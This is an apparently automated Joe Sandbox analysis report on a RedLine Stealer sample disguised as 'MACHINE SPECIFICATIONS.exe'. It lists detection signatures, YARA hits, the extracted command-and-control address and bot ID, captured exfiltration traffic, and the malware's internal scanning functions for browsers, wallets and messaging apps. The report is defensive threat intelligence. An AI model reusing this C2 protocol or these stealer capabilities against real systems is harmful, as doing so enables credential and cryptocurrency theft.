Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MACHINE SPECIFICATIONS.exe

Overview

General Information

Sample Name:MACHINE SPECIFICATIONS.exe
Analysis ID:633730
MD5:6a54566bf72bc5f07bac04c982dab3e6
SHA1:603a754281efa379d923304ba0e8e551888c2188
SHA256:b618d6a08d5d165812cef6e3f1239b33bd4ab60971c3a41d1da8fc22bfb9ac9a
Tags:exeRedLineStealer
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Found malware configuration
Yara detected UAC Bypass using CMSTP
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Tries to steal Crypto Currency Wallets
.NET source code references suspicious native API functions
Contains functionality to hide user accounts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses known network protocols on non-standard ports
Injects a PE file into a foreign processes
Yara detected Generic Downloader
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Enables debug privileges
Is looking for software installed on the system
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Detected TCP or UDP traffic on non-standard ports
Binary contains a suspicious time stamp
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • MACHINE SPECIFICATIONS.exe (PID: 6376 cmdline: "C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe" MD5: 6A54566BF72BC5F07BAC04C982DAB3E6)
    • MACHINE SPECIFICATIONS.exe (PID: 6432 cmdline: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe MD5: 6A54566BF72BC5F07BAC04C982DAB3E6)
      • conhost.exe (PID: 6648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"C2 url": ["185.222.58.90:17910"], "Bot Id": "Lxx"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000001.00000002.364558379.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        00000001.00000002.364558379.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000001.00000000.257898395.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            00000001.00000000.257898395.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000001.00000000.258866341.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                Click to see the 20 entries
                SourceRuleDescriptionAuthorStrings
                1.0.MACHINE SPECIFICATIONS.exe.400000.12.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  1.0.MACHINE SPECIFICATIONS.exe.400000.12.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                    1.0.MACHINE SPECIFICATIONS.exe.400000.12.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      1.0.MACHINE SPECIFICATIONS.exe.400000.12.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                      • 0x1048a:$u7: RunPE
                      • 0x13b41:$u8: DownloadAndEx
                      • 0x9130:$pat14: , CommandLine:
                      • 0x13079:$v2_1: ListOfProcesses
                      • 0x1068b:$v2_2: get_ScanVPN
                      • 0x1072e:$v2_2: get_ScanFTP
                      • 0x1141e:$v2_2: get_ScanDiscord
                      • 0x1240c:$v2_2: get_ScanSteam
                      • 0x12428:$v2_2: get_ScanTelegram
                      • 0x124ce:$v2_2: get_ScanScreen
                      • 0x13216:$v2_2: get_ScanChromeBrowsersPaths
                      • 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths
                      • 0x13509:$v2_2: get_ScanBrowsers
                      • 0x135ca:$v2_2: get_ScannedWallets
                      • 0x135f0:$v2_2: get_ScanWallets
                      • 0x13610:$v2_3: GetArguments
                      • 0x11cd9:$v2_4: VerifyUpdate
                      • 0x165e6:$v2_4: VerifyUpdate
                      • 0x139ca:$v2_5: VerifyScanRequest
                      • 0x130c6:$v2_6: GetUpdates
                      • 0x165c7:$v2_6: GetUpdates
                      0.2.MACHINE SPECIFICATIONS.exe.448b6a8.5.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                        Click to see the 40 entries
                        No Sigma rule has matched
                        No Snort rule has matched

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.400000.10.unpackMalware Configuration Extractor: RedLine {"C2 url": ["185.222.58.90:17910"], "Bot Id": "Lxx"}
                        Source: MACHINE SPECIFICATIONS.exeVirustotal: Detection: 19%Perma Link
                        Source: MACHINE SPECIFICATIONS.exeReversingLabs: Detection: 14%

                        Exploits

                        barindex
                        Source: Yara matchFile source: 0.2.MACHINE SPECIFICATIONS.exe.44464d8.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: MACHINE SPECIFICATIONS.exe PID: 6376, type: MEMORYSTR
                        Source: MACHINE SPECIFICATIONS.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                        Source: Binary string: E:\A\_work\974\s\artifacts\NuGet.Frameworks\16.0\obj\release\net472\NuGet.Frameworks.pdb source: MACHINE SPECIFICATIONS.exe

                        Networking

                        barindex
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49739
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49739
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49739
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49739
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49750
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49750
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49750
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49750
                        Source: Yara matchFile source: 1.0.MACHINE SPECIFICATIONS.exe.400000.12.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.MACHINE SPECIFICATIONS.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.MACHINE SPECIFICATIONS.exe.400000.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.MACHINE SPECIFICATIONS.exe.400000.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.MACHINE SPECIFICATIONS.exe.400000.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.MACHINE SPECIFICATIONS.exe.400000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.MACHINE SPECIFICATIONS.exe.446b688.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.MACHINE SPECIFICATIONS.exe.44464d8.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.MACHINE SPECIFICATIONS.exe.448b6a8.5.raw.unpack, type: UNPACKEDPE
                        Source: Joe Sandbox ViewASN Name: ROOTLAYERNETNL ROOTLAYERNETNL
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.90:17910Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.222.58.90:17910Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.222.58.90:17910Content-Length: 1133614Expect: 100-continueAccept-Encoding: gzip, deflate
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.222.58.90:17910Content-Length: 1133606Expect: 100-continueAccept-Encoding: gzip, deflate
                        Source: global trafficTCP traffic: 192.168.2.3:49739 -> 185.222.58.90:17910
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-java
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: l9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365923298.00000000034F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.90:1
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365714894.00000000033E2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.90:17910
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.90:17910/
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://forms.rea
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000003.364123471.0000000009170000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000003.350858355.0000000009161000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000003.364140812.0000000009170000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000003.364246752.0000000009174000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ns.ado/1
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000003.364123471.0000000009170000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000003.350858355.0000000009161000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000003.364140812.0000000009170000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000003.364246752.0000000009174000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.c/g
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000003.364123471.0000000009170000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000003.350858355.0000000009161000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000003.364140812.0000000009170000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000003.364246752.0000000009174000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.cobj
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365800407.0000000003487000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365596726.000000000339F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/D
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://service.r
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://support.a
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://support.apple.com/kb/HT203092
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365714894.00000000033E2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.365596726.000000000339F000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365923298.00000000034F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnviron
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365923298.00000000034F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365596726.000000000339F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/t_$k
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
                        Source: tmpD3.tmp.1.dr, tmp396.tmp.1.dr, tmp6B6.tmp.1.dr, tmp5EA.tmp.1.dr, tmp51E.tmp.1.dr, tmpFF0D.tmp.1.dr, tmp452.tmp.1.dr, tmp1CE.tmp.1.dr, tmp744.tmp.1.dr, tmp8DB.tmp.1.dr, tmp7DDD.tmp.1.dr, tmp29B.tmp.1.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.280605622.000000000448B000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000000.00000002.280657393.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.364558379.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000000.257898395.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.280605622.000000000448B000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000000.00000002.280657393.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.364558379.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000000.257898395.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                        Source: tmpD3.tmp.1.dr, tmp396.tmp.1.dr, tmp6B6.tmp.1.dr, tmp5EA.tmp.1.dr, tmp51E.tmp.1.dr, tmpFF0D.tmp.1.dr, tmp452.tmp.1.dr, tmp1CE.tmp.1.dr, tmp744.tmp.1.dr, tmp8DB.tmp.1.dr, tmp7DDD.tmp.1.dr, tmp29B.tmp.1.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                        Source: tmpD3.tmp.1.dr, tmp396.tmp.1.dr, tmp6B6.tmp.1.dr, tmp5EA.tmp.1.dr, tmp51E.tmp.1.dr, tmpFF0D.tmp.1.dr, tmp452.tmp.1.dr, tmp1CE.tmp.1.dr, tmp744.tmp.1.dr, tmp8DB.tmp.1.dr, tmp7DDD.tmp.1.dr, tmp29B.tmp.1.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: tmpD3.tmp.1.dr, tmp396.tmp.1.dr, tmp6B6.tmp.1.dr, tmp5EA.tmp.1.dr, tmp51E.tmp.1.dr, tmpFF0D.tmp.1.dr, tmp452.tmp.1.dr, tmp1CE.tmp.1.dr, tmp744.tmp.1.dr, tmp8DB.tmp.1.dr, tmp7DDD.tmp.1.dr, tmp29B.tmp.1.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
